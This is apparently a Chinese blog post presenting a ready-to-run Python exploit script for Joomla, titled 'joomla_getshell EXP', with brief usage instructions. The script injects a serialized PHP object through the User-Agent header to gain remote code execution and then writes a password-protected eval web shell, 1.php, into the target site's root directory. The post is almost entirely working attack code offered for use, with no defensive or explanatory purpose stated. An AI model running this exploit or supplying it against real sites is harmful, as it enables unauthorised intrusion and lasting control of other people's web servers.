Legend‘s BLog
利用方法:利用方法如下:joomla.py http://xxx.xxx.xxx/index.php
执行完成后,dos界面返回空白,并在站点根目录生成一个1.php小马文件
密码1
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
import urllib import re __author__ = 'nlfox233' # !/usr/bin/python # coding=utf-8 import urllib2 import cookielib, sys site = sys.argv[1] #site = 'http://127.0.0.1/autoinstalator/joomla/index.php' code = "file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/1.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))" url = site + '?1=' + urllib.quote("@ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';" + code + ";echo '|<-';") cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) urllib2.socket.setdefaulttimeout(30) ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86' req = urllib2.Request(url=url, headers={'User-Agent': ua}) opener.open(req) req = urllib2.Request(url=url) res = opener.open(req).read() resText = re.findall(r'\-\>\|(.*?)\|\<\-', res, re.DOTALL)[0] print resText |
转载请注明: 转载自Legend‘s BLog
本文链接地址: joomla_getshell EXP
未经允许不得转载:Legend‘s BLog » joomla_getshell EXP
发表评论